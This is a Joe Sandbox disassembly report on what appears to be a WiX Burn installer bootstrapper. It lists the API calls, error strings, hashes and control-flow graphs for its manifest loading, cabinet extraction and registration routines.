                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00C810F6
                                                                                                                                                                      • Part of subcall function 00C81175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C81186
                                                                                                                                                                      • Part of subcall function 00C81175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C81191
                                                                                                                                                                      • Part of subcall function 00C81175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C8119F
                                                                                                                                                                      • Part of subcall function 00C81175: GetLastError.KERNEL32(?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C811BA
                                                                                                                                                                      • Part of subcall function 00C81175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C811C2
                                                                                                                                                                      • Part of subcall function 00C81175: GetLastError.KERNEL32(?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C811D7
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CCB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00C81131
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                    • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                    • API String ID: 3687706282-3151496603
                                                                                                                                                                    • Opcode ID: d107f88721f5c5f33810e72b7da3044a2b12b3def941f1e76755045e91e42359
                                                                                                                                                                    • Instruction ID: 9b647dde727f84a5cff44406983debe7599fa1ffa5585973b214121180b44606
                                                                                                                                                                    • Opcode Fuzzy Hash: d107f88721f5c5f33810e72b7da3044a2b12b3def941f1e76755045e91e42359
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C217EB190021CABCB10EFA5CC4AFDEBBB8AB05719F544119FA11B7281D7705D059BA4
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00CEB5FC,00000000,?,?,?,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CBFEF4
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CBFF04
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CBFF0D
                                                                                                                                                                    • GetLocalTime.KERNEL32(8007139F,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CBFF23
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00CEB5FC,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CC001A
                                                                                                                                                                    Strings
                                                                                                                                                                    • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00CBFFC0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                    • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                    • API String ID: 296830338-59366893
                                                                                                                                                                    • Opcode ID: 9f7a7bf42167cf728fab87dc7d255cacc07e91b267ca9b87abd75aedea164fc5
                                                                                                                                                                    • Instruction ID: 5647c185e90acca2da1551919dda2415649f78d14be0cd59a79021e8c42a773f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f7a7bf42167cf728fab87dc7d255cacc07e91b267ca9b87abd75aedea164fc5
                                                                                                                                                                    • Instruction Fuzzy Hash: 6D417972E01219EBDF219FE5DC45BBFB7B8EB08B11F140029F911AA250D7349E81DBA1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed create working folder., xrefs: 00C9A0EE
                                                                                                                                                                    • Failed to calculate working folder to ensure it exists., xrefs: 00C9A0D8
                                                                                                                                                                    • Failed to copy working folder., xrefs: 00C9A116
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                    • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                    • API String ID: 3841436932-2072961686
                                                                                                                                                                    • Opcode ID: 3d0e33a4d0438a1214585fefd6ff92c363b6ff8168b53fb9db1276015951ac46
                                                                                                                                                                    • Instruction ID: 6a213f75324928c6d4f698f599c375d5a56a4d55c50019f113e2c5ce5fbe43b9
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d0e33a4d0438a1214585fefd6ff92c363b6ff8168b53fb9db1276015951ac46
                                                                                                                                                                    • Instruction Fuzzy Hash: 3201A232901669FB8F226B55DD0EDAEBB79DF85B20B214266F80076210DB319F50F6D1

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                    • API String ID: 760788290-2956246334
                                                                                                                                                                    • Opcode ID: de4f89cb05525d59c0ba94f1ff93841565720e9917a99b077c021e488798819c
                                                                                                                                                                    • Instruction ID: 41652405df7313c659fd9035e200c511ae16ef041193dfcb7124407b96f88ebe
                                                                                                                                                                    • Opcode Fuzzy Hash: de4f89cb05525d59c0ba94f1ff93841565720e9917a99b077c021e488798819c
                                                                                                                                                                    • Instruction Fuzzy Hash: 67E1F632E44275BBCB21BAA4CC42FADB6A4AB05714F15423EFF11F7251C761AE41A7C4

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B502
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B550
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B556
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00C84461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B59E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B5A4
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B601
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B607
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B650
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B656
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B6C7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B6CD
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B716
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B71C
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B765
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B76B
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B7B7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B7BD
                                                                                                                                                                      • Part of subcall function 00C8394F: GetProcessHeap.KERNEL32(?,000001C7,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83960
                                                                                                                                                                      • Part of subcall function 00C8394F: RtlAllocateHeap.NTDLL(00000000,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83967
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B810
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B872
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B8FC
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B906
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                                    • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                                                                                                                    • API String ID: 3411815225-695169583
                                                                                                                                                                    • Opcode ID: aff397154feaedcee76061bcd56b5a9a8d66c5f8b0a4cf694801308e204048f6
                                                                                                                                                                    • Instruction ID: ac76f8d077b833a45698620d5a5f2155d7763338b77769a245bf7146b36a1521
                                                                                                                                                                    • Opcode Fuzzy Hash: aff397154feaedcee76061bcd56b5a9a8d66c5f8b0a4cf694801308e204048f6
                                                                                                                                                                    • Instruction Fuzzy Hash: 4112E772940235ABDB30AB55CC46FAB76A4AF05B54F1101ADFD04BB281E7709E41DBE8

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,?,00CA08BC,?,?), ref: 00CA0D25
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00CA08BC,?,?), ref: 00CA0D2F
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00CA08BC,?,?), ref: 00CA0D74
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00CA08BC,?,?), ref: 00CA0D7F
                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,?,?,00CA08BC,?,?), ref: 00CA0DB7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00CA08BC,?,?), ref: 00CA0DC1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                    • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 1865021742-2104912459
                                                                                                                                                                    • Opcode ID: fedeebfa3022bbf74a9f90288e1ecebd102c186722b46303344d10a42382fe0b
                                                                                                                                                                    • Instruction ID: 009da7d5e54504a0f4972f241d12a03ac1106fa78021248abdc8c7b692a5f545
                                                                                                                                                                    • Opcode Fuzzy Hash: fedeebfa3022bbf74a9f90288e1ecebd102c186722b46303344d10a42382fe0b
                                                                                                                                                                    • Instruction Fuzzy Hash: 22912833A81633BBD33026E58D4AF2A7954BF02B68F224626FF60BB6C0D751DC0092D5

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C85217
                                                                                                                                                                      • Part of subcall function 00CC04F8: InitializeCriticalSection.KERNEL32(00CEB5FC,?,00C85223,00000000,?,?,?,?,?,?), ref: 00CC050F
                                                                                                                                                                      • Part of subcall function 00C8120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00C8523F,00000000,?), ref: 00C81248
                                                                                                                                                                      • Part of subcall function 00C8120A: GetLastError.KERNEL32(?,?,?,00C8523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00C81252
                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00C85285
                                                                                                                                                                      • Part of subcall function 00CC0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00CC0E28
                                                                                                                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00C85317
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00C85321
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C8558E
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize Regutil., xrefs: 00C852C9
                                                                                                                                                                    • Failed to initialize COM., xrefs: 00C85291
                                                                                                                                                                    • Failed to initialize XML util., xrefs: 00C852F9
                                                                                                                                                                    • Failed to run per-user mode., xrefs: 00C85494
                                                                                                                                                                    • Failed to run untrusted mode., xrefs: 00C854B6
                                                                                                                                                                    • Failed to get OS info., xrefs: 00C8534F
                                                                                                                                                                    • Failed to initialize Wiutil., xrefs: 00C852E1
                                                                                                                                                                    • Failed to run RunOnce mode., xrefs: 00C8541C
                                                                                                                                                                    • Invalid run mode., xrefs: 00C853F9
                                                                                                                                                                    • 3.11.1.2318, xrefs: 00C85384
                                                                                                                                                                    • Failed to run per-machine mode., xrefs: 00C8546C
                                                                                                                                                                    • Failed to initialize core., xrefs: 00C853C3
                                                                                                                                                                    • engine.cpp, xrefs: 00C85345
                                                                                                                                                                    • Failed to run embedded mode., xrefs: 00C85444
                                                                                                                                                                    • Failed to parse command line., xrefs: 00C85245
                                                                                                                                                                    • Failed to initialize Cryputil., xrefs: 00C852A6
                                                                                                                                                                    • Failed to initialize engine state., xrefs: 00C8526C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                                                                    • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                                                                    • API String ID: 3262001429-510904028

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 630 c9752a-c9756f call caf8e0 call c8762c 635 c9757b-c9758c call c8c407 630->635 636 c97571-c97576 630->636 642 c97598-c975a9 call c8c26e 635->642 643 c9758e-c97593 635->643 637 c97814-c9781b call cc0237 636->637 645 c9781c-c97821 637->645 649 c975ab-c975b0 642->649 650 c975b5-c975ca call c8c4c8 642->650 643->637 647 c97829-c9782d 645->647 648 c97823-c97824 call cc5636 645->648 652 c9782f-c97832 call cc5636 647->652 653 c97837-c9783c 647->653 648->647 649->637 662 c975cc-c975d1 650->662 663 c975d6-c975e6 call cac001 650->663 652->653 655 c9783e-c9783f call cc5636 653->655 656 c97844-c97851 call c8c1bb 653->656 655->656 664 c9785b-c9785f 656->664 665 c97853-c97856 call cc5636 656->665 662->637 671 c975e8-c975ed 663->671 672 c975f2-c97665 call c95c33 663->672 669 c97869-c9786d 664->669 670 c97861-c97864 call cc5636 664->670 665->664 674 c9786f-c97872 call c83a16 669->674 675 c97877-c9787f 669->675 670->669 671->637 679 c97671-c97676 672->679 680 c97667-c9766c 672->680 674->675 681 c97678 679->681 682 c9767d-c976b4 call c85602 GetCurrentProcess call cc0879 call c8827b 679->682 680->637 681->682 689 c976ce-c976e5 call c8827b 682->689 690 c976b6 682->690 696 c976ee-c976f3 689->696 697 c976e7-c976ec 689->697 691 c976bb-c976c9 call cc0237 690->691 691->645 698 c9774f-c97754 696->698 699 c976f5-c97707 call c8821f 696->699 697->691 701 c97774-c9777d 698->701 702 c97756-c97768 call c8821f 698->702 708 c97709-c9770e 699->708 709 c97713-c97723 call c83436 699->709 704 c97789-c9779d call c9a50c 701->704 705 c9777f-c97782 701->705 702->701 712 c9776a-c9776f 702->712 717 c9779f-c977a4 704->717 718 c977a6 704->718 705->704 710 c97784-c97787 705->710 708->637 721 c9772f-c97743 call c8821f 709->721 722 c97725-c9772a 709->722 710->704 713 c977ac-c977af 710->713 712->637 719 c977b1-c977b4 713->719 720 
c977b6-c977cc call c8d5a0 713->720 717->637 718->713 719->645 719->720 727 c977ce-c977d3 720->727 728 c977d5-c977e4 call c8cbc5 720->728 721->698 730 c97745-c9774a 721->730 722->637 727->637 731 c977e9-c977ed 728->731 730->637 732 c977ef-c977f4 731->732 733 c977f6-c9780d call c8c8e6 731->733 732->637 733->645 736 c9780f 733->736 736->637
                                                                                                                                                                    Strings
                                                                                                                                                                    • WixBundleUILevel, xrefs: 00C976D6, 00C976E7
                                                                                                                                                                    • Failed to load manifest., xrefs: 00C975E8
                                                                                                                                                                    • Failed to set source process path variable., xrefs: 00C97709
                                                                                                                                                                    • Failed to initialize variables., xrefs: 00C97571
                                                                                                                                                                    • Failed to open manifest stream., xrefs: 00C975AB
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 00C97759
                                                                                                                                                                    • WixBundleSourceProcessFolder, xrefs: 00C97734
                                                                                                                                                                    • Failed to initialize internal cache functionality., xrefs: 00C9779F
                                                                                                                                                                    • Failed to overwrite the %ls built-in variable., xrefs: 00C976BB
                                                                                                                                                                    • WixBundleElevated, xrefs: 00C976A5, 00C976B6
                                                                                                                                                                    • Failed to extract bootstrapper application payloads., xrefs: 00C977EF
                                                                                                                                                                    • Failed to get source process folder from path., xrefs: 00C97725
                                                                                                                                                                    • WixBundleSourceProcessPath, xrefs: 00C976F8
                                                                                                                                                                    • Failed to set source process folder variable., xrefs: 00C97745
                                                                                                                                                                    • Failed to get manifest stream from container., xrefs: 00C975CC
                                                                                                                                                                    • Failed to get unique temporary folder for bootstrapper application., xrefs: 00C977CE
                                                                                                                                                                    • Failed to open attached UX container., xrefs: 00C9758E
                                                                                                                                                                    • Failed to load catalog files., xrefs: 00C9780F
                                                                                                                                                                    • Failed to parse command line., xrefs: 00C97667
                                                                                                                                                                    • Failed to set original source variable., xrefs: 00C9776A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                    • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                                    • API String ID: 32694325-1564579409

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 842 c8762c-c87edf InitializeCriticalSection 843 c87ee2-c87f06 call c85623 842->843 846 c87f08-c87f0f 843->846 847 c87f13-c87f24 call cc0237 843->847 846->843 848 c87f11 846->848 850 c87f27-c87f39 call cae06f 847->850 848->850
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00C9756B,00C853BD,00000000,00C85445), ref: 00C8764C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
